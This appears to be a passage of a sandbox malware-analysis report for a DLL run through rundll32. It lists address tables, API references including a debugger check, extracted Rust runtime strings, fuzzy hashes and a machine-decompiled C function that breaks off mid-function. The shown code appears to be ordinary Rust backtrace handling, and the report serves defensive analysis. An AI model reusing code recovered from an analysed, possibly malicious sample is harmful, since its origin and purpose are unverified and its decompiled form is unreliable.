                                                                                                                                                                                      0x6e9dd8c4
                                                                                                                                                                                      0x6e9dd8c9
                                                                                                                                                                                      0x6e9dd8d6
                                                                                                                                                                                      0x6e9dd8d9
                                                                                                                                                                                      0x6e9dd8de
                                                                                                                                                                                      0x6e9dd8de
                                                                                                                                                                                      0x6e9dd8c9
                                                                                                                                                                                      0x6e9dd8c2
                                                                                                                                                                                      0x6e9dd8e1
                                                                                                                                                                                      0x6e9dd8e1
                                                                                                                                                                                      0x6e9dd8e3
                                                                                                                                                                                      0x6e9dd93d
                                                                                                                                                                                      0x6e9dd940
                                                                                                                                                                                      0x6e9dd942
                                                                                                                                                                                      0x6e9dd945
                                                                                                                                                                                      0x6e9dd8e5
                                                                                                                                                                                      0x6e9dd8e8
                                                                                                                                                                                      0x6e9dd8eb
                                                                                                                                                                                      0x6e9dd8f1
                                                                                                                                                                                      0x6e9dd8f8
                                                                                                                                                                                      0x6e9dd900
                                                                                                                                                                                      0x6e9dd903
                                                                                                                                                                                      0x6e9dd905
                                                                                                                                                                                      0x6e9dd908
                                                                                                                                                                                      0x6e9dd90b
                                                                                                                                                                                      0x6e9dd90e
                                                                                                                                                                                      0x6e9dd912
                                                                                                                                                                                      0x6e9dd914
                                                                                                                                                                                      0x6e9dd916
                                                                                                                                                                                      0x6e9dd91a
                                                                                                                                                                                      0x6e9dd91c
                                                                                                                                                                                      0x6e9dd91c
                                                                                                                                                                                      0x6e9dd928
                                                                                                                                                                                      0x6e9dd928
                                                                                                                                                                                      0x6e9dd936
                                                                                                                                                                                      0x6e9dd936
                                                                                                                                                                                      0x6e9dd8f1
                                                                                                                                                                                      0x6e9dd948
                                                                                                                                                                                      0x6e9dd94f
                                                                                                                                                                                      0x6e9dd960
                                                                                                                                                                                      0x6e9dd960
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd831
                                                                                                                                                                                      0x6e9dd827
                                                                                                                                                                                      0x6e9dd62e
                                                                                                                                                                                      0x6e9dd62e
                                                                                                                                                                                      0x6e9dd630
                                                                                                                                                                                      0x6e9dd632
                                                                                                                                                                                      0x6e9dd632
                                                                                                                                                                                      0x6e9dd636
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd638
                                                                                                                                                                                      0x6e9dd63d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd63f
                                                                                                                                                                                      0x6e9dd63f
                                                                                                                                                                                      0x6e9dd644
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd646
                                                                                                                                                                                      0x6e9dd646
                                                                                                                                                                                      0x6e9dd64b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd64d
                                                                                                                                                                                      0x6e9dd64d
                                                                                                                                                                                      0x6e9dd652
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd654
                                                                                                                                                                                      0x6e9dd654
                                                                                                                                                                                      0x6e9dd659
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd65b
                                                                                                                                                                                      0x6e9dd65b
                                                                                                                                                                                      0x6e9dd660
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd662
                                                                                                                                                                                      0x6e9dd662
                                                                                                                                                                                      0x6e9dd667
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd669
                                                                                                                                                                                      0x6e9dd669
                                                                                                                                                                                      0x6e9dd66c
                                                                                                                                                                                      0x6e9dd66f
                                                                                                                                                                                      0x6e9dd672
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd672
                                                                                                                                                                                      0x6e9dd667
                                                                                                                                                                                      0x6e9dd660
                                                                                                                                                                                      0x6e9dd659
                                                                                                                                                                                      0x6e9dd652
                                                                                                                                                                                      0x6e9dd64b
                                                                                                                                                                                      0x6e9dd644
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd63d
                                                                                                                                                                                      0x6e9dd694
                                                                                                                                                                                      0x6e9dd694
                                                                                                                                                                                      0x6e9dd697
                                                                                                                                                                                      0x6e9dd69e
                                                                                                                                                                                      0x6e9dd6a5
                                                                                                                                                                                      0x6e9dd6a7
                                                                                                                                                                                      0x6e9dd6a9
                                                                                                                                                                                      0x6e9dd6ab
                                                                                                                                                                                      0x6e9dd6ad
                                                                                                                                                                                      0x6e9dd6b3
                                                                                                                                                                                      0x6e9dd6be
                                                                                                                                                                                      0x6e9dd6be
                                                                                                                                                                                      0x6e9dd6b3
                                                                                                                                                                                      0x6e9dd6ab
                                                                                                                                                                                      0x6e9dd6c3
                                                                                                                                                                                      0x6e9dd6c7
                                                                                                                                                                                      0x6e9dd6cd
                                                                                                                                                                                      0x6e9dd6d2
                                                                                                                                                                                      0x6e9dd6d5
                                                                                                                                                                                      0x6e9dd6d8
                                                                                                                                                                                      0x6e9dd6e0
                                                                                                                                                                                      0x6e9dd6e2
                                                                                                                                                                                      0x6e9dd6e5
                                                                                                                                                                                      0x6e9dd6e8
                                                                                                                                                                                      0x6e9dd6eb
                                                                                                                                                                                      0x6e9dd6ef
                                                                                                                                                                                      0x6e9dd6f1
                                                                                                                                                                                      0x6e9dd6f3
                                                                                                                                                                                      0x6e9dd6f7
                                                                                                                                                                                      0x6e9dd6f9
                                                                                                                                                                                      0x6e9dd6f9
                                                                                                                                                                                      0x6e9dd705
                                                                                                                                                                                      0x6e9dd70a
                                                                                                                                                                                      0x6e9dd70a
                                                                                                                                                                                      0x6e9dd716
                                                                                                                                                                                      0x6e9dd716
                                                                                                                                                                                      0x6e9dd859
                                                                                                                                                                                      0x6e9dd85c
                                                                                                                                                                                      0x6e9dd862
                                                                                                                                                                                      0x6e9dd862
                                                                                                                                                                                      0x6e9dd865
                                                                                                                                                                                      0x6e9dd875
                                                                                                                                                                                      0x6e9dd875
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd62c
                                                                                                                                                                                      0x6e9dd43d
                                                                                                                                                                                      0x6e9dd3bc
                                                                                                                                                                                      0x6e9dd3bc
                                                                                                                                                                                      0x6e9dd3c3
                                                                                                                                                                                      0x6e9dd96a
                                                                                                                                                                                      0x6e9dd96f
                                                                                                                                                                                      0x6e9dd974
                                                                                                                                                                                      0x6e9dd979
                                                                                                                                                                                      0x6e9dd97b
                                                                                                                                                                                      0x6e9dd982
                                                                                                                                                                                      0x6e9dd98a
                                                                                                                                                                                      0x6e9dd994
                                                                                                                                                                                      0x6e9dd99f
                                                                                                                                                                                      0x6e9dd9af
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dd3c9
                                                                                                                                                                                      0x6e9dd3c3
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 6E9DD3BC
                                                                                                                                                                                      • HeapAlloc.KERNEL32(02A40000,00000000,0000000A), ref: 6E9DD3D3
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                      • String ID: RUST_BACKTRACE
                                                                                                                                                                                      • API String ID: 1617791916-3454309823
                                                                                                                                                                                      • Opcode ID: d68a0f4c6b295554f33a8ca33829b98d1cfad231b125650c321f0f3822e694cf
                                                                                                                                                                                      • Instruction ID: ad586900c9ecc80b8d89ffd6a6b117459378df383075dd083c0b875fa8e8f131
                                                                                                                                                                                      • Opcode Fuzzy Hash: d68a0f4c6b295554f33a8ca33829b98d1cfad231b125650c321f0f3822e694cf
                                                                                                                                                                                      • Instruction Fuzzy Hash: B302CEB1E00A298BDB11CFD8C8907EDBBB5EF49314F148269D519BB380D771A889CF95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • {recursion limit reached}{invalid syntax}, xrefs: 6E9D7C06
                                                                                                                                                                                      • ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E9D7602, 6E9D7A59
                                                                                                                                                                                      • bool, xrefs: 6E9D788B
                                                                                                                                                                                      • called `Option::unwrap()` on a `None` value, xrefs: 6E9D79BC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                                                      • String ID: ?'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$bool$called `Option::unwrap()` on a `None` value${recursion limit reached}{invalid syntax}
                                                                                                                                                                                      • API String ID: 3839614884-433696047
                                                                                                                                                                                      • Opcode ID: dcf6589a831109f76284fc955bfeaeb4b2749b1ed48ee6a682a7f7b13c19a0c2
                                                                                                                                                                                      • Instruction ID: 4a48af53d434588036786a82a4353238593188208bc34d8bcb906a3afe03e63c
                                                                                                                                                                                      • Opcode Fuzzy Hash: dcf6589a831109f76284fc955bfeaeb4b2749b1ed48ee6a682a7f7b13c19a0c2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E11875A08B624FD304CFA8C49076AB7E5AF86314F14C96ED8958B3D1D334D84ACF52
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6E9ED1D8
                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 6E9ED2A4
                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E9ED2C4
                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 6E9ED2CE
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                      • Opcode ID: ef6ec04a1adafa7eb86a3a799db27b78bcdc3c4a6bfcb2043d0d46c3f6a4da9d
                                                                                                                                                                                      • Instruction ID: 79b619be8b24a144da45d6cff490ab8276dfce5fa48f88002506c7957b8b6c15
                                                                                                                                                                                      • Opcode Fuzzy Hash: ef6ec04a1adafa7eb86a3a799db27b78bcdc3c4a6bfcb2043d0d46c3f6a4da9d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A3116B5D052189BDF12DFA4D989BCCBBB8AF48304F1044AAE50DAB240EB719A85CF44
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                      			E6E9DDD30(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, long _a8) {
                                                                                                                                                                                      				void* _v16;
                                                                                                                                                                                      				char _v1456;
                                                                                                                                                                                      				void* __ebp;
                                                                                                                                                                                      				void _t191;
                                                                                                                                                                                      				void* _t194;
                                                                                                                                                                                      				long _t195;
                                                                                                                                                                                      				signed int _t200;
                                                                                                                                                                                      				void* _t201;
                                                                                                                                                                                      				void* _t204;
                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                      				long _t206;
                                                                                                                                                                                      				char _t208;
                                                                                                                                                                                      				void* _t217;
                                                                                                                                                                                      				void* _t218;
                                                                                                                                                                                      				void* _t221;
                                                                                                                                                                                      				void* _t227;
                                                                                                                                                                                      				void* _t229;
                                                                                                                                                                                      				void* _t233;
                                                                                                                                                                                      				void* _t235;
                                                                                                                                                                                      				void* _t241;
                                                                                                                                                                                      				void* _t243;
                                                                                                                                                                                      				void* _t244;
                                                                                                                                                                                      				void* _t246;
                                                                                                                                                                                      				void* _t250;
                                                                                                                                                                                      				void* _t252;
                                                                                                                                                                                      				long _t260;
                                                                                                                                                                                      				long _t262;
                                                                                                                                                                                      				void* _t263;
                                                                                                                                                                                      				void* _t264;
                                                                                                                                                                                      				char _t265;
                                                                                                                                                                                      				void* _t267;
                                                                                                                                                                                      				void* _t274;
                                                                                                                                                                                      				void* _t284;
                                                                                                                                                                                      				void* _t288;
                                                                                                                                                                                      				long _t291;
                                                                                                                                                                                      				WCHAR* _t293;
                                                                                                                                                                                      				void* _t294;
                                                                                                                                                                                      				WCHAR* _t304;
                                                                                                                                                                                      				long _t305;
                                                                                                                                                                                      				void* _t307;
                                                                                                                                                                                      				void* _t308;
                                                                                                                                                                                      				intOrPtr _t310;
                                                                                                                                                                                      				intOrPtr _t313;
                                                                                                                                                                                      				signed int _t315;
                                                                                                                                                                                      				intOrPtr _t317;
                                                                                                                                                                                      				void* _t318;
                                                                                                                                                                                      				void* _t322;
                                                                                                                                                                                      				void* _t324;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                      				_t317 = (_t315 & 0xfffffff0) - 0x5b0;
                                                                                                                                                                                      				_t310 = _t317;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x598)) = _t313;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x59c)) = _t317;
                                                                                                                                                                                      				 *(_t310 + 0x5a8) = 0xffffffff;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x5a4)) = E6E9E39E0;
                                                                                                                                                                                      				 *((intOrPtr*)(_t310 + 0x5a0)) =  *[fs:0x0];
                                                                                                                                                                                      				 *[fs:0x0] = _t310 + 0x5a0;
                                                                                                                                                                                      				_t191 =  *_a4;
                                                                                                                                                                                      				 *(_t310 + 0x28) = _t191;
                                                                                                                                                                                      				 *(_t310 + 0xe) = _t191;
                                                                                                                                                                                      				E6E9EE9D0(__edi, _t310 + 0x190, 0, 0x400);
                                                                                                                                                                                      				_t318 = _t317 + 0xc;
                                                                                                                                                                                      				_t194 =  *0x6ea1f8cc; // 0x2
                                                                                                                                                                                      				_t262 = 0x200;
                                                                                                                                                                                      				 *(_t310 + 0x24) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x2c) = _t194;
                                                                                                                                                                                      				 *(_t310 + 0x30) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x14) = _t194;
                                                                                                                                                                                      				 *(_t310 + 0x34) = 0;
                                                                                                                                                                                      				 *(_t310 + 0x10) = 0x200;
                                                                                                                                                                                      				if(0x200 >= 0x201) {
                                                                                                                                                                                      					L4:
                                                                                                                                                                                      					_t291 =  *(_t310 + 0x24);
                                                                                                                                                                                      					_t263 = _t262 - _t291;
                                                                                                                                                                                      					__eflags =  *(_t310 + 0x30) - _t291 - _t263;
                                                                                                                                                                                      					if( *(_t310 + 0x30) - _t291 < _t263) {
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 0;
                                                                                                                                                                                      						_t274 = _t310 + 0x2c;
                                                                                                                                                                                      						E6E9F9A30(_t274, _t291, _t263);
                                                                                                                                                                                      						_t318 = _t318 + 4;
                                                                                                                                                                                      						 *(_t310 + 0x14) =  *(_t310 + 0x2c);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t262 =  *(_t310 + 0x10);
                                                                                                                                                                                      					_t304 =  *(_t310 + 0x14);
                                                                                                                                                                                      					 *(_t310 + 0x34) = _t262;
                                                                                                                                                                                      					 *(_t310 + 0x24) = _t262;
                                                                                                                                                                                      					 *(_t310 + 0x20) = _t304;
                                                                                                                                                                                      					 *(_t310 + 0x1c) = _t262;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L7:
                                                                                                                                                                                      					_t304 = _t310 + 0x190;
                                                                                                                                                                                      					 *(_t310 + 0x1c) = 0x200;
                                                                                                                                                                                      					 *(_t310 + 0x20) = _t304;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L8:
                                                                                                                                                                                      				SetLastError(0);
                                                                                                                                                                                      				_t195 = GetCurrentDirectoryW(_t262, _t304);
                                                                                                                                                                                      				_t305 = _t195;
                                                                                                                                                                                      				if(_t195 != 0 || GetLastError() == 0) {
                                                                                                                                                                                      					if(_t305 != _t262 || GetLastError() != 0x7a) {
                                                                                                                                                                                      						__eflags = _t305 -  *(_t310 + 0x10);
                                                                                                                                                                                      						_t262 = _t305;
                                                                                                                                                                                      						if(_t305 <  *(_t310 + 0x10)) {
                                                                                                                                                                                      							_t292 =  *(_t310 + 0x1c);
                                                                                                                                                                                      							 *(_t310 + 0x5a8) = 0;
                                                                                                                                                                                      							__eflags = _t305 -  *(_t310 + 0x1c);
                                                                                                                                                                                      							if(__eflags > 0) {
                                                                                                                                                                                      								E6E9F9470(_t262, _t305, _t292, _t305, _t310, __eflags, 0x6ea206e0);
                                                                                                                                                                                      								goto L70;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t293 =  *(_t310 + 0x20);
                                                                                                                                                                                      								_t274 = _t310 + 0x70;
                                                                                                                                                                                      								_push(_t305);
                                                                                                                                                                                      								E6E9E0D10(_t262, _t274, _t293, _t305, _t310);
                                                                                                                                                                                      								_t318 = _t318 + 4;
                                                                                                                                                                                      								asm("movsd xmm0, [esi+0x70]");
                                                                                                                                                                                      								_t264 = 0;
                                                                                                                                                                                      								 *(_t310 + 0x48) =  *(_t310 + 0x78);
                                                                                                                                                                                      								asm("movsd [esi+0x40], xmm0");
                                                                                                                                                                                      								_t200 =  *(_t310 + 0x30);
                                                                                                                                                                                      								__eflags = _t200;
                                                                                                                                                                                      								if(_t200 != 0) {
                                                                                                                                                                                      									goto L18;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      								}
                                                                                                                                                                                      								goto L21;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags = _t262 - 0x201;
                                                                                                                                                                                      							 *(_t310 + 0x10) = _t262;
                                                                                                                                                                                      							if(_t262 < 0x201) {
                                                                                                                                                                                      								goto L7;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							goto L8;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
                                                                                                                                                                                      						 *(_t310 + 0x10) = _t262;
                                                                                                                                                                                      						if(_t262 >= 0x201) {
                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L8;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t260 = GetLastError();
                                                                                                                                                                                      					_t264 = 1;
                                                                                                                                                                                      					 *(_t310 + 0x44) = _t260;
                                                                                                                                                                                      					 *(_t310 + 0x40) = 0;
                                                                                                                                                                                      					_t200 =  *(_t310 + 0x30);
                                                                                                                                                                                      					__eflags = _t200;
                                                                                                                                                                                      					if(_t200 != 0) {
                                                                                                                                                                                      						L18:
                                                                                                                                                                                      						__eflags =  *(_t310 + 0x14);
                                                                                                                                                                                      						if( *(_t310 + 0x14) != 0) {
                                                                                                                                                                                      							__eflags = _t200 & 0x7fffffff;
                                                                                                                                                                                      							if((_t200 & 0x7fffffff) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0,  *(_t310 + 0x14));
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					L21:
                                                                                                                                                                                      					__eflags = _t264;
                                                                                                                                                                                      					if(_t264 == 0) {
                                                                                                                                                                                      						_t201 =  *(_t310 + 0x40);
                                                                                                                                                                                      						_t274 =  *(_t310 + 0x44);
                                                                                                                                                                                      						_t293 =  *(_t310 + 0x48);
                                                                                                                                                                                      						_t265 =  *(_t310 + 0x28);
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						__eflags =  *(_t310 + 0x40) - 3;
                                                                                                                                                                                      						if( *(_t310 + 0x40) == 3) {
                                                                                                                                                                                      							_t288 =  *(_t310 + 0x44);
                                                                                                                                                                                      							 *(_t310 + 0x10) = _t288;
                                                                                                                                                                                      							 *(_t310 + 0x5a8) = 1;
                                                                                                                                                                                      							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
                                                                                                                                                                                      							_t318 = _t318 + 4;
                                                                                                                                                                                      							_t250 =  *(_t310 + 0x10);
                                                                                                                                                                                      							_t274 =  *(_t250 + 4);
                                                                                                                                                                                      							__eflags =  *(_t274 + 4);
                                                                                                                                                                                      							if( *(_t274 + 4) != 0) {
                                                                                                                                                                                      								_t252 =  *_t250;
                                                                                                                                                                                      								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
                                                                                                                                                                                      								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
                                                                                                                                                                                      									_t252 =  *(_t252 - 4);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t252);
                                                                                                                                                                                      								_t250 =  *(_t310 + 0x44);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							HeapFree( *0x6ea2e128, 0, _t250);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t265 =  *(_t310 + 0xe);
                                                                                                                                                                                      						_t201 = 0;
                                                                                                                                                                                      						 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *((char*)(_t310 + 0x68)) = _t265;
                                                                                                                                                                                      					 *(_t310 + 0x5c) = _t201;
                                                                                                                                                                                      					 *(_t310 + 0x64) = _t293;
                                                                                                                                                                                      					 *(_t310 + 0x60) = _t274;
                                                                                                                                                                                      					 *(_t310 + 0x190) = 0x6ea1fdd8;
                                                                                                                                                                                      					 *(_t310 + 0x194) = 1;
                                                                                                                                                                                      					 *(_t310 + 0x198) = 0;
                                                                                                                                                                                      					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ea1f570;
                                                                                                                                                                                      					 *(_t310 + 0x1a4) = 0;
                                                                                                                                                                                      					_t294 =  *(_a8 + 0x1c);
                                                                                                                                                                                      					_push(_t310 + 0x190);
                                                                                                                                                                                      					_t204 = E6E9D2150( *((intOrPtr*)(_a8 + 0x18)), _t294);
                                                                                                                                                                                      					_t322 = _t318 + 4;
                                                                                                                                                                                      					__eflags = _t204;
                                                                                                                                                                                      					if(_t204 != 0) {
                                                                                                                                                                                      						L50:
                                                                                                                                                                                      						_t205 =  *(_t310 + 0x5c);
                                                                                                                                                                                      						__eflags = _t205;
                                                                                                                                                                                      						if(_t205 != 0) {
                                                                                                                                                                                      							__eflags =  *(_t310 + 0x60);
                                                                                                                                                                                      							if( *(_t310 + 0x60) != 0) {
                                                                                                                                                                                      								HeapFree( *0x6ea2e128, 0, _t205);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t206 = 1;
                                                                                                                                                                                      						goto L54;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t208 =  *(_t310 + 0xe);
                                                                                                                                                                                      						 *(_t310 + 0x6c) = 0;
                                                                                                                                                                                      						 *((char*)(_t310 + 0xf)) = 0;
                                                                                                                                                                                      						 *(_t310 + 0x40) = _a8;
                                                                                                                                                                                      						 *(_t310 + 0x44) = 0;
                                                                                                                                                                                      						__eflags = _t208;
                                                                                                                                                                                      						 *((char*)(_t310 + 0x50)) = _t208;
                                                                                                                                                                                      						 *(_t310 + 0x2c) = _t310 + 0xe;
                                                                                                                                                                                      						 *(_t310 + 0x48) = _t310 + 0x5c;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6ea1fde0;
                                                                                                                                                                                      						 *(_t310 + 0x1b) = _t208 != 0;
                                                                                                                                                                                      						 *(_t310 + 0x30) = _t310 + 0x6c;
                                                                                                                                                                                      						 *(_t310 + 0x34) = _t310 + 0x1b;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
                                                                                                                                                                                      						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
                                                                                                                                                                                      						 *(_t310 + 0x10) = GetCurrentProcess();
                                                                                                                                                                                      						 *(_t310 + 0x24) = GetCurrentThread();
                                                                                                                                                                                      						_t307 = _t310 + 0x190;
                                                                                                                                                                                      						E6E9EE9D0(_t307, _t307, 0, 0x2d0);
                                                                                                                                                                                      						_t324 = _t322 + 0xc;
                                                                                                                                                                                      						_push(_t307);
                                                                                                                                                                                      						L6E9EC5AE();
                                                                                                                                                                                      						_t217 = E6E9DE4E0(_t265, _t307, _t310);
                                                                                                                                                                                      						__eflags = _t217;
                                                                                                                                                                                      						if(_t217 == 0) {
                                                                                                                                                                                      							_t308 =  *0x6ea2e148; // 0x0
                                                                                                                                                                                      							 *(_t310 + 0x58) = _t294;
                                                                                                                                                                                      							__eflags = _t308;
                                                                                                                                                                                      							if(_t308 == 0) {
                                                                                                                                                                                      								_t218 = GetProcAddress( *0x6ea2e130, "SymFunctionTableAccess64");
                                                                                                                                                                                      								__eflags = _t218;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      									E6E9F94E0(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      									goto L70;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t308 = _t218;
                                                                                                                                                                                      									 *0x6ea2e148 = _t218;
                                                                                                                                                                                      									_t267 =  *0x6ea2e14c; // 0x0
                                                                                                                                                                                      									__eflags = _t267;
                                                                                                                                                                                      									if(_t267 != 0) {
                                                                                                                                                                                      										goto L41;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L39;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t267 =  *0x6ea2e14c; // 0x0
                                                                                                                                                                                      								__eflags = _t267;
                                                                                                                                                                                      								if(_t267 != 0) {
                                                                                                                                                                                      									L41:
                                                                                                                                                                                      									 *(_t310 + 0x20) = GetCurrentProcess();
                                                                                                                                                                                      									_t221 =  *0x6ea2e158; // 0x0
                                                                                                                                                                                      									 *(_t310 + 0x1c) = _t308;
                                                                                                                                                                                      									 *(_t310 + 0x14) = _t267;
                                                                                                                                                                                      									__eflags = _t221;
                                                                                                                                                                                      									if(_t221 != 0) {
                                                                                                                                                                                      										L44:
                                                                                                                                                                                      										 *(_t310 + 0x28) = _t221;
                                                                                                                                                                                      										 *(_t310 + 0x74) = 0;
                                                                                                                                                                                      										 *(_t310 + 0x70) = 0;
                                                                                                                                                                                      										E6E9EE9D0(_t308, _t310 + 0x80, 0, 0x10c);
                                                                                                                                                                                      										_t324 = _t324 + 0xc;
                                                                                                                                                                                      										 *(_t310 + 0x7c) = 0;
                                                                                                                                                                                      										 *(_t310 + 0x78) =  *(_t310 + 0x248);
